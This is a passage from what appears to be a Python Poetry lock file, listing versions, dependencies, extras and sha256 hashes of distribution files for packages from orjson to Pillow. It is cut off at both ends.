"orjson-3.9.10-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:674eb520f02422546c40401f4efaf8207b5e29e420c17051cddf6c02783ff5ca"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d0dc4310da8b5f6415949bd5ef937e60aeb0eb6b16f95041b5e43e6200821fb"}, {file = "orjson-3.9.10-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e99c625b8c95d7741fe057585176b1b8783d46ed4b8932cf98ee145c4facf499"}, {file = "orjson-3.9.10-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ec6f18f96b47299c11203edfbdc34e1b69085070d9a3d1f302810cc23ad36bf3"}, {file = "orjson-3.9.10-cp311-none-win32.whl", hash = "sha256:ce0a29c28dfb8eccd0f16219360530bc3cfdf6bf70ca384dacd36e6c650ef8e8"}, {file = "orjson-3.9.10-cp311-none-win_amd64.whl", hash = "sha256:cf80b550092cc480a0cbd0750e8189247ff45457e5a023305f7ef1bcec811616"}, {file = "orjson-3.9.10-cp312-cp312-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:602a8001bdf60e1a7d544be29c82560a7b49319a0b31d62586548835bbe2c862"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f295efcd47b6124b01255d1491f9e46f17ef40d3d7eabf7364099e463fb45f0f"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:92af0d00091e744587221e79f68d617b432425a7e59328ca4c496f774a356071"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c5a02360e73e7208a872bf65a7554c9f15df5fe063dc047f79738998b0506a14"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:858379cbb08d84fe7583231077d9a36a1a20eb72f8c9076a45df8b083724ad1d"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:666c6fdcaac1f13eb982b649e1c311c08d7097cbda24f32612dae43648d8db8d"}, {file = "orjson-3.9.10-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:3fb205ab52a2e30354640780ce4587157a9563a68c9beaf52153e1cea9aa0921"}, {file = "orjson-3.9.10-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:7ec960b1b942ee3c69323b8721df2a3ce28ff40e7ca47873ae35bfafeb4555ca"}, {file = "orjson-3.9.10-cp312-none-win_amd64.whl", hash = "sha256:3e892621434392199efb54e69edfff9f699f6cc36dd9553c5bf796058b14b20d"}, {file = "orjson-3.9.10-cp38-cp38-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:8b9ba0ccd5a7f4219e67fbbe25e6b4a46ceef783c42af7dbc1da548eb28b6531"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2e2ecd1d349e62e3960695214f40939bbfdcaeaaa62ccc638f8e651cf0970e5f"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:7f433be3b3f4c66016d5a20e5b4444ef833a1f802ced13a2d852c637f69729c1"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4689270c35d4bb3102e103ac43c3f0b76b169760aff8bcf2d401a3e0e58cdb7f"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4bd176f528a8151a6efc5359b853ba3cc0e82d4cd1fab9c1300c5d957dc8f48c"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a2ce5ea4f71681623f04e2b7dadede3c7435dfb5e5e2d1d0ec25b35530e277b"}, {file = "orjson-3.9.10-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:49f8ad582da6e8d2cf663c4ba5bf9f83cc052570a3a767487fec6af839b0e777"}, {file = "orjson-3.9.10-cp38-cp38-musllinux_1_1_x86_64.whl", hash = 
"sha256:2a11b4b1a8415f105d989876a19b173f6cdc89ca13855ccc67c18efbd7cbd1f8"}, {file = "orjson-3.9.10-cp38-none-win32.whl", hash = "sha256:a353bf1f565ed27ba71a419b2cd3db9d6151da426b61b289b6ba1422a702e643"}, {file = "orjson-3.9.10-cp38-none-win_amd64.whl", hash = "sha256:e28a50b5be854e18d54f75ef1bb13e1abf4bc650ab9d635e4258c58e71eb6ad5"}, {file = "orjson-3.9.10-cp39-cp39-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:ee5926746232f627a3be1cc175b2cfad24d0170d520361f4ce3fa2fd83f09e1d"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0a73160e823151f33cdc05fe2cea557c5ef12fdf276ce29bb4f1c571c8368a60"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c338ed69ad0b8f8f8920c13f529889fe0771abbb46550013e3c3d01e5174deef"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5869e8e130e99687d9e4be835116c4ebd83ca92e52e55810962446d841aba8de"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d2c1e559d96a7f94a4f581e2a32d6d610df5840881a8cba8f25e446f4d792df3"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:81a3a3a72c9811b56adf8bcc829b010163bb2fc308877e50e9910c9357e78521"}, {file = "orjson-3.9.10-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:7f8fb7f5ecf4f6355683ac6881fd64b5bb2b8a60e3ccde6ff799e48791d8f864"}, {file = "orjson-3.9.10-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:c943b35ecdf7123b2d81d225397efddf0bce2e81db2f3ae633ead38e85cd5ade"}, {file = "orjson-3.9.10-cp39-none-win32.whl", hash = "sha256:fb0b361d73f6b8eeceba47cd37070b5e6c9de5beaeaa63a1cb35c7e1a73ef088"}, {file = "orjson-3.9.10-cp39-none-win_amd64.whl", hash = "sha256:b90f340cb6397ec7a854157fac03f0c82b744abdd1c0941a024c3c29d1340aff"}, {file = "orjson-3.9.10.tar.gz", hash = "sha256:9ebbdbd6a046c304b1845e96fbcc5559cd296b4dfd3ad2509e33c4d9ce07d6a1"}, ] [[package]] name = "overrides" version = "7.4.0" description = "A decorator to automatically detect mismatch when overriding a method." 
optional = false python-versions = ">=3.6" files = [ {file = "overrides-7.4.0-py3-none-any.whl", hash = "sha256:3ad24583f86d6d7a49049695efe9933e67ba62f0c7625d53c59fa832ce4b8b7d"}, {file = "overrides-7.4.0.tar.gz", hash = "sha256:9502a3cca51f4fac40b5feca985b6703a5c1f6ad815588a7ca9e285b9dca6757"}, ] [[package]] name = "packaging" version = "23.2" description = "Core utilities for Python packages" optional = false python-versions = ">=3.7" files = [ {file = "packaging-23.2-py3-none-any.whl", hash = "sha256:8c491190033a9af7e1d931d0b5dacc2ef47509b34dd0de67ed209b5203fc88c7"}, {file = "packaging-23.2.tar.gz", hash = "sha256:048fb0e9405036518eaaf48a55953c750c11e1a1b68e0dd1a9d62ed0c092cfc5"}, ] [[package]] name = "pandas" version = "2.0.3" description = "Powerful data structures for data analysis, time series, and statistics" optional = false python-versions = ">=3.8" files = [ {file = "pandas-2.0.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e4c7c9f27a4185304c7caf96dc7d91bc60bc162221152de697c98eb0b2648dd8"}, {file = "pandas-2.0.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:f167beed68918d62bffb6ec64f2e1d8a7d297a038f86d4aed056b9493fca407f"}, {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ce0c6f76a0f1ba361551f3e6dceaff06bde7514a374aa43e33b588ec10420183"}, {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba619e410a21d8c387a1ea6e8a0e49bb42216474436245718d7f2e88a2f8d7c0"}, {file = "pandas-2.0.3-cp310-cp310-win32.whl", hash = "sha256:3ef285093b4fe5058eefd756100a367f27029913760773c8bf1d2d8bebe5d210"}, {file = "pandas-2.0.3-cp310-cp310-win_amd64.whl", hash = "sha256:9ee1a69328d5c36c98d8e74db06f4ad518a1840e8ccb94a4ba86920986bb617e"}, {file = "pandas-2.0.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b084b91d8d66ab19f5bb3256cbd5ea661848338301940e17f4492b2ce0801fe8"}, {file = "pandas-2.0.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:37673e3bdf1551b95bf5d4ce372b37770f9529743d2498032439371fc7b7eb26"}, {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b9cb1e14fdb546396b7e1b923ffaeeac24e4cedd14266c3497216dd4448e4f2d"}, {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d9cd88488cceb7635aebb84809d087468eb33551097d600c6dad13602029c2df"}, {file = "pandas-2.0.3-cp311-cp311-win32.whl", hash = "sha256:694888a81198786f0e164ee3a581df7d505024fbb1f15202fc7db88a71d84ebd"}, {file = "pandas-2.0.3-cp311-cp311-win_amd64.whl", hash = "sha256:6a21ab5c89dcbd57f78d0ae16630b090eec626360085a4148693def5452d8a6b"}, {file = "pandas-2.0.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9e4da0d45e7f34c069fe4d522359df7d23badf83abc1d1cef398895822d11061"}, {file = "pandas-2.0.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:32fca2ee1b0d93dd71d979726b12b61faa06aeb93cf77468776287f41ff8fdc5"}, {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:258d3624b3ae734490e4d63c430256e716f488c4fcb7c8e9bde2d3aa46c29089"}, {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eae3dc34fa1aa7772dd3fc60270d13ced7346fcbcfee017d3132ec625e23bb0"}, {file = "pandas-2.0.3-cp38-cp38-win32.whl", hash = "sha256:f3421a7afb1a43f7e38e82e844e2bca9a6d793d66c1a7f9f0ff39a795bbc5e02"}, {file = "pandas-2.0.3-cp38-cp38-win_amd64.whl", hash = "sha256:69d7f3884c95da3a31ef82b7618af5710dba95bb885ffab339aad925c3e8ce78"}, {file = 
"pandas-2.0.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5247fb1ba347c1261cbbf0fcfba4a3121fbb4029d95d9ef4dc45406620b25c8b"}, {file = "pandas-2.0.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:81af086f4543c9d8bb128328b5d32e9986e0c84d3ee673a2ac6fb57fd14f755e"}, {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1994c789bf12a7c5098277fb43836ce090f1073858c10f9220998ac74f37c69b"}, {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ec591c48e29226bcbb316e0c1e9423622bc7a4eaf1ef7c3c9fa1a3981f89641"}, {file = "pandas-2.0.3-cp39-cp39-win32.whl", hash = "sha256:04dbdbaf2e4d46ca8da896e1805bc04eb85caa9a82e259e8eed00254d5e0c682"}, {file = "pandas-2.0.3-cp39-cp39-win_amd64.whl", hash = "sha256:1168574b036cd8b93abc746171c9b4f1b83467438a5e45909fed645cf8692dbc"}, {file = "pandas-2.0.3.tar.gz", hash = "sha256:c02f372a88e0d17f36d3093a644c73cfc1788e876a7c4bcb4020a77512e2043c"}, ] [package.dependencies] numpy = [ {version = ">=1.23.2", markers = "python_version >= \"3.11\""}, {version = ">=1.20.3", markers = "python_version < \"3.10\""}, {version = ">=1.21.0", markers = "python_version >= \"3.10\" and python_version < \"3.11\""}, ] python-dateutil = ">=2.8.2" pytz = ">=2020.1" tzdata = ">=2022.1" [package.extras] all = ["PyQt5 (>=5.15.1)", "SQLAlchemy (>=1.4.16)", "beautifulsoup4 (>=4.9.3)", "bottleneck (>=1.3.2)", "brotlipy (>=0.7.0)", "fastparquet (>=0.6.3)", "fsspec (>=2021.07.0)", "gcsfs (>=2021.07.0)", "html5lib (>=1.1)", "hypothesis (>=6.34.2)", "jinja2 (>=3.0.0)", "lxml (>=4.6.3)", "matplotlib (>=3.6.1)", "numba (>=0.53.1)", "numexpr (>=2.7.3)", "odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pandas-gbq (>=0.15.0)", "psycopg2 (>=2.8.6)", "pyarrow (>=7.0.0)", "pymysql (>=1.0.2)", "pyreadstat (>=1.1.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)", "python-snappy (>=0.6.0)", "pyxlsb (>=1.0.8)", "qtpy (>=2.2.0)", "s3fs (>=2021.08.0)", "scipy (>=1.7.1)", "tables (>=3.6.1)", "tabulate (>=0.8.9)", "xarray (>=0.21.0)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)", "zstandard (>=0.15.2)"] aws = ["s3fs (>=2021.08.0)"] clipboard = ["PyQt5 (>=5.15.1)", "qtpy (>=2.2.0)"] compression = ["brotlipy (>=0.7.0)", "python-snappy (>=0.6.0)", "zstandard (>=0.15.2)"] computation = ["scipy (>=1.7.1)", "xarray (>=0.21.0)"] excel = ["odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pyxlsb (>=1.0.8)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)"] feather = ["pyarrow (>=7.0.0)"] fss = ["fsspec (>=2021.07.0)"] gcp = ["gcsfs (>=2021.07.0)", "pandas-gbq (>=0.15.0)"] hdf5 = ["tables (>=3.6.1)"] html = ["beautifulsoup4 (>=4.9.3)", "html5lib (>=1.1)", "lxml (>=4.6.3)"] mysql = ["SQLAlchemy (>=1.4.16)", "pymysql (>=1.0.2)"] output-formatting = ["jinja2 (>=3.0.0)", "tabulate (>=0.8.9)"] parquet = ["pyarrow (>=7.0.0)"] performance = ["bottleneck (>=1.3.2)", "numba (>=0.53.1)", "numexpr (>=2.7.1)"] plot = ["matplotlib (>=3.6.1)"] postgresql = ["SQLAlchemy (>=1.4.16)", "psycopg2 (>=2.8.6)"] spss = ["pyreadstat (>=1.1.2)"] sql-other = ["SQLAlchemy (>=1.4.16)"] test = ["hypothesis (>=6.34.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)"] xml = ["lxml (>=4.6.3)"] [[package]] name = "pandocfilters" version = "1.5.0" description = "Utilities for writing pandoc filters in python" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "pandocfilters-1.5.0-py2.py3-none-any.whl", hash = "sha256:33aae3f25fd1a026079f5d27bdd52496f0e0803b3469282162bafdcbdf6ef14f"}, {file = 
"pandocfilters-1.5.0.tar.gz", hash = "sha256:0b679503337d233b4339a817bfc8c50064e2eff681314376a47cb582305a7a38"}, ] [[package]] name = "para" version = "0.0.8" description = "a set utilities that ake advantage of python's 'multiprocessing' module to distribute CPU-intensive tasks" optional = true python-versions = "*" files = [ {file = "para-0.0.8-py3-none-any.whl", hash = "sha256:c63b030658cafd84f8fabfc000142324d51c7440e50ef5012fd1a54972ca25f4"}, {file = "para-0.0.8.tar.gz", hash = "sha256:46c3232ae9d8ea9d886cfd08cdd112892202bed8645f40b6255597ba4cfef217"}, ] [[package]] name = "parso" version = "0.8.3" description = "A Python Parser" optional = false python-versions = ">=3.6" files = [ {file = "parso-0.8.3-py2.py3-none-any.whl", hash = "sha256:c001d4636cd3aecdaf33cbb40aebb59b094be2a74c556778ef5576c175e19e75"}, {file = "parso-0.8.3.tar.gz", hash = "sha256:8c07be290bb59f03588915921e29e8a50002acaf2cdc5fa0e0114f91709fafa0"}, ] [package.extras] qa = ["flake8 (==3.8.3)", "mypy (==0.782)"] testing = ["docopt", "pytest (<6.0.0)"] [[package]] name = "pathos" version = "0.3.1" description = "parallel graph management and execution in heterogeneous computing" optional = true python-versions = ">=3.7" files = [ {file = "pathos-0.3.1-py3-none-any.whl", hash = "sha256:b1c7145e2adcc19c7e9cac48f110ea5a63e300c1cc10c2947d4857dc97a47b46"}, {file = "pathos-0.3.1.tar.gz", hash = "sha256:c9a088021493c5cb627d4459bba6c0533c684199e271a5dc297d62be23d74019"}, ] [package.dependencies] dill = ">=0.3.7" multiprocess = ">=0.70.15" pox = ">=0.3.3" ppft = ">=1.7.6.7" [[package]] name = "pathspec" version = "0.11.2" description = "Utility library for gitignore style pattern matching of file paths." optional = false python-versions = ">=3.7" files = [ {file = "pathspec-0.11.2-py3-none-any.whl", hash = "sha256:1d6ed233af05e679efb96b1851550ea95bbb64b7c490b0f5aa52996c11e92a20"}, {file = "pathspec-0.11.2.tar.gz", hash = "sha256:e0d8d0ac2f12da61956eb2306b69f9469b42f4deb0f3cb6ed47b9cce9996ced3"}, ] [[package]] name = "pdfminer-six" version = "20221105" description = "PDF parser and analyzer" optional = true python-versions = ">=3.6" files = [ {file = "pdfminer.six-20221105-py3-none-any.whl", hash = "sha256:1eaddd712d5b2732f8ac8486824533514f8ba12a0787b3d5fe1e686cd826532d"}, {file = "pdfminer.six-20221105.tar.gz", hash = "sha256:8448ab7b939d18b64820478ecac5394f482d7a79f5f7eaa7703c6c959c175e1d"}, ] [package.dependencies] charset-normalizer = ">=2.0.0" cryptography = ">=36.0.0" [package.extras] dev = ["black", "mypy (==0.931)", "nox", "pytest"] docs = ["sphinx", "sphinx-argparse"] image = ["Pillow"] [[package]] name = "pexpect" version = "4.8.0" description = "Pexpect allows easy control of interactive console applications." 
optional = false python-versions = "*" files = [ {file = "pexpect-4.8.0-py2.py3-none-any.whl", hash = "sha256:0b48a55dcb3c05f3329815901ea4fc1537514d6ba867a152b581d69ae3710937"}, {file = "pexpect-4.8.0.tar.gz", hash = "sha256:fc65a43959d153d0114afe13997d439c22823a27cefceb5ff35c2178c6784c0c"}, ] [package.dependencies] ptyprocess = ">=0.5" [[package]] name = "pgvector" version = "0.1.8" description = "pgvector support for Python" optional = true python-versions = ">=3.6" files = [ {file = "pgvector-0.1.8-py2.py3-none-any.whl", hash = "sha256:99dce3a6580ef73863edb9b8441937671f4e1a09383826e6b0838176cd441a96"}, ] [package.dependencies] numpy = "*" [[package]] name = "pickleshare" version = "0.7.5" description = "Tiny 'shelve'-like database with concurrency support" optional = false python-versions = "*" files = [ {file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"}, {file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"}, ] [[package]] name = "pillow" version = "10.1.0" description = "Python Imaging Library (Fork)" optional = true python-versions = ">=3.8" files = [ {file = "Pillow-10.1.0-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:1ab05f3db77e98f93964697c8efc49c7954b08dd61cff526b7f2531a22410106"}, {file = "Pillow-10.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6932a7652464746fcb484f7fc3618e6503d2066d853f68a4bd97193a3996e273"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5f63b5a68daedc54c7c3464508d8c12075e56dcfbd42f8c1bf40169061ae666"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c0949b55eb607898e28eaccb525ab104b2d86542a85c74baf3a6dc24002edec2"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:ae88931f93214777c7a3aa0a8f92a683f83ecde27f65a45f95f22d289a69e593"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:b0eb01ca85b2361b09480784a7931fc648ed8b7836f01fb9241141b968feb1db"}, {file = "Pillow-10.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d27b5997bdd2eb9fb199982bb7eb6164db0426904020dc38c10203187ae2ff2f"}, {file = "Pillow-10.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:7df5608bc38bd37ef585ae9c38c9cd46d7c81498f086915b0f97255ea60c2818"}, {file = "Pillow-10.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:41f67248d92a5e0a2076d3517d8d4b1e41a97e2df10eb8f93106c89107f38b57"}, {file = "Pillow-10.1.0-cp311-cp311-macosx_10_10_x86_64.whl", hash = "sha256:1fb29c07478e6c06a46b867e43b0bcdb241b44cc52be9bc25ce5944eed4648e7"}, {file = "Pillow-10.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:2cdc65a46e74514ce742c2013cd4a2d12e8553e3a2563c64879f7c7e4d28bce7"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50d08cd0a2ecd2a8657bd3d82c71efd5a58edb04d9308185d66c3a5a5bed9610"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:062a1610e3bc258bff2328ec43f34244fcec972ee0717200cb1425214fe5b839"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:61f1a9d247317fa08a308daaa8ee7b3f760ab1809ca2da14ecc88ae4257d6172"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:a646e48de237d860c36e0db37ecaecaa3619e6f3e9d5319e527ccbc8151df061"}, {file = "Pillow-10.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = 
"sha256:47e5bf85b80abc03be7455c95b6d6e4896a62f6541c1f2ce77a7d2bb832af262"}, {file = "Pillow-10.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a92386125e9ee90381c3369f57a2a50fa9e6aa8b1cf1d9c4b200d41a7dd8e992"}, {file = "Pillow-10.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:0f7c276c05a9767e877a0b4c5050c8bee6a6d960d7f0c11ebda6b99746068c2a"}, {file = "Pillow-10.1.0-cp312-cp312-macosx_10_10_x86_64.whl", hash = "sha256:a89b8312d51715b510a4fe9fc13686283f376cfd5abca8cd1c65e4c76e21081b"}, {file = "Pillow-10.1.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:00f438bb841382b15d7deb9a05cc946ee0f2c352653c7aa659e75e592f6fa17d"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3d929a19f5469b3f4df33a3df2983db070ebb2088a1e145e18facbc28cae5b27"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9a92109192b360634a4489c0c756364c0c3a2992906752165ecb50544c251312"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:0248f86b3ea061e67817c47ecbe82c23f9dd5d5226200eb9090b3873d3ca32de"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:9882a7451c680c12f232a422730f986a1fcd808da0fd428f08b671237237d651"}, {file = "Pillow-10.1.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:1c3ac5423c8c1da5928aa12c6e258921956757d976405e9467c5f39d1d577a4b"}, {file = "Pillow-10.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:806abdd8249ba3953c33742506fe414880bad78ac25cc9a9b1c6ae97bedd573f"}, {file = "Pillow-10.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:eaed6977fa73408b7b8a24e8b14e59e1668cfc0f4c40193ea7ced8e210adf996"}, {file = "Pillow-10.1.0-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:fe1e26e1ffc38be097f0ba1d0d07fcade2bcfd1d023cda5b29935ae8052bd793"}, {file = "Pillow-10.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7a7e3daa202beb61821c06d2517428e8e7c1aab08943e92ec9e5755c2fc9ba5e"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:24fadc71218ad2b8ffe437b54876c9382b4a29e030a05a9879f615091f42ffc2"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa1d323703cfdac2036af05191b969b910d8f115cf53093125e4058f62012c9a"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:912e3812a1dbbc834da2b32299b124b5ddcb664ed354916fd1ed6f193f0e2d01"}, {file = "Pillow-10.1.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:7dbaa3c7de82ef37e7708521be41db5565004258ca76945ad74a8e998c30af8d"}, {file = "Pillow-10.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9d7bc666bd8c5a4225e7ac71f2f9d12466ec555e89092728ea0f5c0c2422ea80"}, {file = "Pillow-10.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:baada14941c83079bf84c037e2d8b7506ce201e92e3d2fa0d1303507a8538212"}, {file = "Pillow-10.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:2ef6721c97894a7aa77723740a09547197533146fba8355e86d6d9a4a1056b14"}, {file = "Pillow-10.1.0-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:0a026c188be3b443916179f5d04548092e253beb0c3e2ee0a4e2cdad72f66099"}, {file = "Pillow-10.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:04f6f6149f266a100374ca3cc368b67fb27c4af9f1cc8cb6306d849dcdf12616"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bb40c011447712d2e19cc261c82655f75f32cb724788df315ed992a4d65696bb"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:1a8413794b4ad9719346cd9306118450b7b00d9a15846451549314a58ac42219"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:c9aeea7b63edb7884b031a35305629a7593272b54f429a9869a4f63a1bf04c34"}, {file = "Pillow-10.1.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:b4005fee46ed9be0b8fb42be0c20e79411533d1fd58edabebc0dd24626882cfd"}, {file = "Pillow-10.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4d0152565c6aa6ebbfb1e5d8624140a440f2b99bf7afaafbdbf6430426497f28"}, {file = "Pillow-10.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d921bc90b1defa55c9917ca6b6b71430e4286fc9e44c55ead78ca1a9f9eba5f2"}, {file = "Pillow-10.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:cfe96560c6ce2f4c07d6647af2d0f3c54cc33289894ebd88cfbb3bcd5391e256"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-macosx_10_10_x86_64.whl", hash = "sha256:937bdc5a7f5343d1c97dc98149a0be7eb9704e937fe3dc7140e229ae4fc572a7"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1c25762197144e211efb5f4e8ad656f36c8d214d390585d1d21281f46d556ba"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:afc8eef765d948543a4775f00b7b8c079b3321d6b675dde0d02afa2ee23000b4"}, {file = "Pillow-10.1.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:883f216eac8712b83a63f41b76ddfb7b2afab1b74abbb413c5df6680f071a6b9"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-macosx_10_10_x86_64.whl", hash = "sha256:b920e4d028f6442bea9a75b7491c063f0b9a3972520731ed26c83e254302eb1e"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1c41d960babf951e01a49c9746f92c5a7e0d939d1652d7ba30f6b3090f27e412"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:1fafabe50a6977ac70dfe829b2d5735fd54e190ab55259ec8aea4aaea412fa0b"}, {file = "Pillow-10.1.0-pp39-pypy39_pp73-win_amd64.whl", hash = 